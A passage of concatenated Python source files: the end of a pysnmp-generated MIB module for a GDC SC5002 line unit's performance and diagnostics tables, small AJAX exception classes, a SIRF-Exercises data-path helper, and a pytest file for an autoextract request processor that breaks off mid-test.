if mibBuilder.loadTexts: sc5002FarEndCurrent15MinStat.setDescription('Returns a bitwise map of the far end interface in one of the previous 16, individual 15 minute, intervals. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 -- 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 ')
sc5002FarEndIntervalTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6), )
if mibBuilder.loadTexts: sc5002FarEndIntervalTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalTable.setDescription('The sc5002FarEnd Interval table.')
sc5002FarEndIntervalEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndIntervalIndex"), (0, "SC5002-MIB", "sc5002FarEndIntervalNumber"))
if mibBuilder.loadTexts: sc5002FarEndIntervalEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalEntry.setDescription('An entry in the Interval table.')
sc5002FarEndIntervalIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndIntervalIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndIntervalNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndIntervalNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalNumber.setDescription('A number between 1 and 16, where 1 is the most recently completed 15 minute interval and 16 is the least recently completed 15 minutes interval (assuming that all 16 intervals are valid).')
sc5002FarEndIntervalStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(9, 9)).setFixedLength(9)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndIntervalStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalStat.setDescription('Returns a bitwise map of statistics for the far end interface in the current 15 minute interval. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 ')
sc5002CurrentFarEnd24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7), )
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrTable.setDescription('The Current 24 Hour table.')
sc5002CurrentFarEnd24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002CurrentFarEnd24HrIndex"))
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrEntry.setDescription('An entry in the Current 24 Hr table.')
sc5002CurrentFarEnd24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002CurrentFarEnd24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrStat.setDescription('Returns a bitwise map of statistics for the interface in the current 24 hour interval. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 -- 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 ')
sc5002RecentFarEnd24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8), )
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrTable.setDescription('The Recent 24 Hour table.')
sc5002RecentFarEnd24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002RecentFarEnd24HrIndex"))
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrEntry.setDescription('An entry in the Recent 24 Hr table.')
sc5002RecentFarEnd24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002RecentFarEnd24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrStat.setDescription('Returns a bitwise map of statistics for the interface in the Recent 24 hour interval. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 ')
sc5002NearEndUnavailableTimeRegTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9), )
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegTable.setDescription('The sc5002 Unavailable Time Register table.')
sc5002NearEndUnavailableTimeRegEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndUnavailableTimeRegIndex"), (0, "SC5002-MIB", "sc5002NearEndUnavailableTimeRegNumber"))
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegEntry.setDescription('An entry in the Unavailable Time Register table.')
sc5002NearEndUnavailableTimeRegIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndUnavailableTimeRegNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 6))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegNumber.setDescription('A number between 1 and 6, where the number is the number of the Unavailable Time Register.')
sc5002NearEndUnavailableTimeRegStart = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStart.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStart.setDescription('Start time of one of the Unavailable Time Registers.')
sc5002NearEndUnavailableTimeRegStop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStop.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStop.setDescription('Stop time of one of the Unavailable Time Registers.')
sc5002FarEndUnavailableTimeRegTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10), )
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegTable.setDescription('The sc5002 Unavailable Time Register table.')
sc5002FarEndUnavailableTimeRegEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndUnavailableTimeRegIndex"), (0, "SC5002-MIB", "sc5002FarEndUnavailableTimeRegNumber"))
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegEntry.setDescription('An entry in the Unavailable Time Register table.')
sc5002FarEndUnavailableTimeRegIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndUnavailableTimeRegNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 6))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegNumber.setDescription('A number between 1 and 6, where the number is the number of the Unavailable Time Register.')
sc5002FarEndUnavailableTimeRegStart = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStart.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStart.setDescription('Start time of one of the Unavailable Time Registers.')
sc5002FarEndUnavailableTimeRegStop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStop.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStop.setDescription('Stop time of one of the Unavailable Time Registers.')
sc5002DiagTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1), )
if mibBuilder.loadTexts: sc5002DiagTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DiagTable.setDescription('The GDC 5002 Diagnostics table. Information in the entries of this table support diagnostics testing, both active testing via patterns, and passive testing via loopbacks.')
sc5002DiagEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002DiagIndex"))
if mibBuilder.loadTexts: sc5002DiagEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DiagEntry.setDescription('The GDC 5002 Diagnostics table entry.')
sc5002DiagIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002DiagIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DiagIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002LoopbackConfig = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noLoopBack", 1), ("lineLoopBack", 2), ("unitTest", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002LoopbackConfig.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002LoopbackConfig.setDescription('Selects the test to run. A get of this object returns the test that is currently running. A set of noLoopBack(1) ends the test that is currently running. A set of lineLoopBack(2) starts a line loop back test. The line loop back test runs until a set of noLoopBack(1) is sent. A set of unitTest(3) starts a unit test. The unit test runs for 15 seconds.')
sc5002TestResult = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("pass", 1), ("fail", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002TestResult.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002TestResult.setDescription('The results of the last diagnostic test completed. The value returned is only valid if a get of sc5002LoopbackConfig returns noLoopBack(1).')
mibBuilder.exportSymbols("SC5002-MIB", sc5002NearEndSevErrSec=sc5002NearEndSevErrSec, sc5002CurrentFarEnd24HrIndex=sc5002CurrentFarEnd24HrIndex, sc5002PowerUp=sc5002PowerUp, sc5002LossOfFrame=sc5002LossOfFrame, sc5002RecentFarEnd24HrStat=sc5002RecentFarEnd24HrStat, sc5002ActiveFirmwareRev=sc5002ActiveFirmwareRev, sc5002RecentFarEnd24HrIndex=sc5002RecentFarEnd24HrIndex, sc5002NearEndAlarmCfgIdentifier=sc5002NearEndAlarmCfgIdentifier, sc5002MaintenanceLineIndex=sc5002MaintenanceLineIndex, sc5002FarEndAlarmCfgEntry=sc5002FarEndAlarmCfgEntry, sc5002NearEndCurrent15MinIndex=sc5002NearEndCurrent15MinIndex, sc5002FarEndCurrent15MinIndex=sc5002FarEndCurrent15MinIndex, sc5002NearEndResetStats=sc5002NearEndResetStats, sc5002DiagIndex=sc5002DiagIndex, sc5002NearEndLnCodeViol=sc5002NearEndLnCodeViol, sc5002VersionIndex=sc5002VersionIndex, sc5002FarEndResetStats=sc5002FarEndResetStats, gdc=gdc, sc5002FarEndCurrent15MinTable=sc5002FarEndCurrent15MinTable, sc5002FarEndUnavailableTimeRegTable=sc5002FarEndUnavailableTimeRegTable, sc5002DiagTable=sc5002DiagTable, sc5002FarEndUnavailableTimeRegIndex=sc5002FarEndUnavailableTimeRegIndex, sc5002DiagEntry=sc5002DiagEntry, sc5002FarEndUnavailableTimeRegStart=sc5002FarEndUnavailableTimeRegStart, sc5002StoredFirmwareStatus=sc5002StoredFirmwareStatus, sc5002FarEndBkdBlkErr=sc5002FarEndBkdBlkErr, sc5002TestResult=sc5002TestResult, sc5002NearEndAlarmWindow=sc5002NearEndAlarmWindow, sc5002MaintenanceEntry=sc5002MaintenanceEntry, sc5002NearEndCurrent24HrEntry=sc5002NearEndCurrent24HrEntry, sc5002FarEndErrSec=sc5002FarEndErrSec, sc5002DiagRxErr=sc5002DiagRxErr, sc5002SwitchActiveFirmware=sc5002SwitchActiveFirmware, sc5002NoResponse=sc5002NoResponse, sc5002NearEndStatLastInitialized=sc5002NearEndStatLastInitialized, sc5002Alarms=sc5002Alarms, sc5002VersionTable=sc5002VersionTable, sc5002NearEndCurrent24HrStat=sc5002NearEndCurrent24HrStat, sc5002NearEndAlarmCfgIndex=sc5002NearEndAlarmCfgIndex, sc5002RecentFarEnd24HrTable=sc5002RecentFarEnd24HrTable, sc5002Performance=sc5002Performance, sc5002NearEndRecent24HrStat=sc5002NearEndRecent24HrStat, sc5002FarEndIntervalIndex=sc5002FarEndIntervalIndex, sc5002NearEndAlarmCfgTable=sc5002NearEndAlarmCfgTable, sc5002CurrentFarEnd24HrStat=sc5002CurrentFarEnd24HrStat, sc5002AlarmData=sc5002AlarmData, sc5002FarEndIntervalNumber=sc5002FarEndIntervalNumber, sc5002FarEndIntervalTable=sc5002FarEndIntervalTable, sc5002CurrentFarEnd24HrTable=sc5002CurrentFarEnd24HrTable, sc5002NearEndCurrent15MinStat=sc5002NearEndCurrent15MinStat, sc5002FarEndValidIntervals=sc5002FarEndValidIntervals, sc5002AlarmIndSignal=sc5002AlarmIndSignal, sc5002FarEndUnavlSec=sc5002FarEndUnavlSec, sc5002NearEndErrSec=sc5002NearEndErrSec, sc5002E1SignalingMode=sc5002E1SignalingMode, sc5002NearEndCurrent24HrTable=sc5002NearEndCurrent24HrTable, dsx1=dsx1, sc5002NearEndValidIntervals=sc5002NearEndValidIntervals, sc5002LoopbackConfig=sc5002LoopbackConfig, sc5002NetworkCfgTable=sc5002NetworkCfgTable, sc5002NearEndRecent24HrEntry=sc5002NearEndRecent24HrEntry, sc5002FarEndIntervalStat=sc5002FarEndIntervalStat, sc5002FarEndIntervalEntry=sc5002FarEndIntervalEntry, sc5002NearEndCurrent24HrIndex=sc5002NearEndCurrent24HrIndex, sc5002NetworkCfg=sc5002NetworkCfg, sc5002FarEndSevErrSec=sc5002FarEndSevErrSec, sc5002FarEndCurrent15MinStat=sc5002FarEndCurrent15MinStat, sc5002CurrentFarEnd24HrEntry=sc5002CurrentFarEnd24HrEntry, sc5002NvRamCorrupt=sc5002NvRamCorrupt, sc5002NearEndUnavailableTimeRegTable=sc5002NearEndUnavailableTimeRegTable, sc5002NetworkCfgIndex=sc5002NetworkCfgIndex, sc5002FarEndStatLastInitialized=sc5002FarEndStatLastInitialized, sc5002NearEndUnavailableTimeRegStart=sc5002NearEndUnavailableTimeRegStart, sc5002NearEndCurrent15MinTable=sc5002NearEndCurrent15MinTable, sc5002FarEndAlarmCfgIdentifier=sc5002FarEndAlarmCfgIdentifier, sc5002NearEndAlarmCfgEntry=sc5002NearEndAlarmCfgEntry, sc5002DownloadingMode=sc5002DownloadingMode, sc5002FirmwareRev=sc5002FirmwareRev, sc5002NearEndUnavailableTimeRegStop=sc5002NearEndUnavailableTimeRegStop, sc5002Version=sc5002Version, sc5002NearEndIntervalNumber=sc5002NearEndIntervalNumber, sc5002LedStatus=sc5002LedStatus, sc5002NearEndRecent24HrTable=sc5002NearEndRecent24HrTable, sc5002RecentFarEnd24HrEntry=sc5002RecentFarEnd24HrEntry, sc5002VersionEntry=sc5002VersionEntry, sc5002FarEndCurrent15MinEntry=sc5002FarEndCurrent15MinEntry, sc5002NetworkCfgEntry=sc5002NetworkCfgEntry, sc5002FarEndAlarmCfgIndex=sc5002FarEndAlarmCfgIndex, sc5002UnitFailure=sc5002UnitFailure, sc5002NearEndUnavailableTimeRegEntry=sc5002NearEndUnavailableTimeRegEntry, sc5002DefaultInit=sc5002DefaultInit, sc5002NearEndAlarmThreshold=sc5002NearEndAlarmThreshold, sc5002NearEndBkdBlkErr=sc5002NearEndBkdBlkErr, sc5002Maintenance=sc5002Maintenance, sc5002SoftReset=sc5002SoftReset, sc5002NearEndUnavailableTimeRegIndex=sc5002NearEndUnavailableTimeRegIndex, sc5002NearEndCurrent15MinEntry=sc5002NearEndCurrent15MinEntry, sc5002MIBversion=sc5002MIBversion, sc5002BootRev=sc5002BootRev, sc5002NearEndIntervalEntry=sc5002NearEndIntervalEntry, sc5002FarEndAlarmCfgTable=sc5002FarEndAlarmCfgTable, sc5002NearEndUnavailableTimeRegNumber=sc5002NearEndUnavailableTimeRegNumber, sc5002TimingLoss=sc5002TimingLoss, sc5002FarEndAlarmThreshold=sc5002FarEndAlarmThreshold, sc5002NearEndIntervalIndex=sc5002NearEndIntervalIndex, sc5002NearEndIntervalStat=sc5002NearEndIntervalStat, sc5002NearEndIntervalTable=sc5002NearEndIntervalTable, sc5002FarEndUnavailableTimeRegStop=sc5002FarEndUnavailableTimeRegStop, sc5002FarEndUnavailableTimeRegNumber=sc5002FarEndUnavailableTimeRegNumber, sc5002=sc5002, sc5002FarEndUnavailableTimeRegEntry=sc5002FarEndUnavailableTimeRegEntry, sc5002FallbackTimingActive=sc5002FallbackTimingActive, sc5002NearEndUnavlSec=sc5002NearEndUnavlSec, sc5002FarEndAlarmWindow=sc5002FarEndAlarmWindow, sc5002MaintenanceTable=sc5002MaintenanceTable, sc5002SysUpTime=sc5002SysUpTime, sc5002NearEndRecent24HrIndex=sc5002NearEndRecent24HrIndex, sc5002LossOfSignal=sc5002LossOfSignal, sc5002StoredFirmwareRev=sc5002StoredFirmwareRev, sc5002Diagnostics=sc5002Diagnostics)
|
# -*- mode: python; coding: utf-8; -*-
""" Custom exceptions """
class AjaxException(Exception):
"""Base class for AJAX exceptions"""
pass
class Ajax404(AjaxException):
"""Object not found"""
pass
class AjaxDataException(AjaxException):
"""
Use it to push json data to response
"""
def __init__(self, data, *args, **kwargs):
self.data = data
Exception.__init__(self, *args, **kwargs)
class RedirectException(Exception):
def __init__(self, redirect_uri, *args, **kwargs):
self.redirect_uri = redirect_uri
self.notice_message = kwargs.pop('notice_message', None)
self.error_message = kwargs.pop('error_message', None)
Exception.__init__(self, *args, **kwargs)
|
'''Library of common utilities shared between notebooks in SIRF-Exercises.'''
# Author: Ashley Gillman
# Copyright 2021 Commonwealth Scientific and Industrial Research Organisation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
def exercises_data_path(*data_type):
'''
Returns the path to data used by SIRF-exercises.
data_type: either 'PET', 'MR' or 'Synergistic', or use multiple arguments for
subdirectories like exercises_data_path('PET', 'mMR', 'NEMA_IQ').
'''
try:
# from installer?
from .data_path import data_path
except ImportError:
# from ENV variable?
data_path = os.environ.get('SIRF_EXERCISES_DATA_PATH')
if data_path is None or not os.path.exists(data_path):
raise RuntimeError(
"Exercises data weren't found. Please run download_data.sh in the "
"scripts directory")
return os.path.join(data_path, *data_type) |
import pytest
from autoextract.aio.client import RequestProcessor
from autoextract.aio.errors import _QueryError
def test_request_processor_without_retries():
# Given an initial query with two items
initial_query = [
{
"url": "https://example.org/first",
"pageType": "article",
},
{
"url": "https://example.org/second",
"pageType": "article",
},
]
# Initialize our request processor with this query
request_processor = RequestProcessor(query=initial_query)
# Since we haven't processed any response yet,
# our request processor should have:
#
# Empty results
assert request_processor.get_latest_results() == []
# Pending queries list equal to our initial query
assert request_processor.pending_queries == initial_query
# Given our first response with a success and an error
first_response = [
{
"query": {
"id": "1",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/first",
"pageType": "article"
}
},
"article": {
"name": "My first article",
},
},
{
"query": {
"id": "2",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/second",
"pageType": "article"
}
},
"error": "Proxy error: internal_error",
},
]
# Process this response
results = request_processor.process_results(first_response)
# Results should be equal to our response
assert results == first_response
# Latest results should be equal to our response
assert request_processor.get_latest_results() == results
# Our pending queries list should be empty
# because retry is disabled
assert request_processor.pending_queries == []
def test_request_processor_with_not_retriable_error():
# Given an initial query with two items
initial_query = [
{
"url": "https://example.org/first",
"pageType": "article",
},
{
"url": "https://example.org/second",
"pageType": "article",
},
]
# Initialize our request processor with this query
request_processor = RequestProcessor(query=initial_query, max_retries=3)
# Since we haven't processed any response yet,
# our request processor should have:
#
# Empty results
assert request_processor.get_latest_results() == []
# Pending queries list equal to our initial query
assert request_processor.pending_queries == initial_query
# Given our first response with a success and an error
first_response = [
{
"query": {
"id": "1",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/first",
"pageType": "article"
}
},
"article": {
"name": "My first article",
},
},
{
"query": {
"id": "2",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/second",
"pageType": "article"
}
},
"error": "Downloader error: http404",
},
]
# When processing this response, no _QueryError should be raised
# because the 404 error is not retriable
results = request_processor.process_results(first_response)
# Results should be equal to our response
assert results == first_response
# Latest results should be equal to our response
assert request_processor.get_latest_results() == results
# Our pending queries list should be empty
# because the errors found are not retriable
assert request_processor.pending_queries == []
def test_request_processor_with_retries():
# Given an initial query with two items
initial_query = [
{
"url": "https://example.org/first",
"pageType": "article",
},
{
"url": "https://example.org/second",
"pageType": "article",
},
]
# Initialize our request processor with this query
request_processor = RequestProcessor(query=initial_query, max_retries=3)
# Since we haven't processed any response yet,
# our request processor should have:
#
# Empty results
assert request_processor.get_latest_results() == []
# Pending queries list equal to our initial query
assert request_processor.pending_queries == initial_query
# Given our first response with a success and an error
first_response = [
{
"query": {
"id": "1",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/first",
"pageType": "article"
}
},
"article": {
"name": "My first article",
},
},
{
"query": {
"id": "2",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/second",
"pageType": "article"
}
},
"error": "Proxy error: internal_error",
},
]
# An exception should be raised while processing this response
with pytest.raises(_QueryError):
request_processor.process_results(first_response)
# Latest results should be equal to our response
assert request_processor.get_latest_results() == first_response
# Our pending queries list should contain our query with error
error_query = first_response[1]
assert "error" in error_query
user_query = error_query["query"]["userQuery"]
assert request_processor.pending_queries == [user_query]
# Given another error response for this missing query
second_response = [
{
"query": {
"id": "3",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/second",
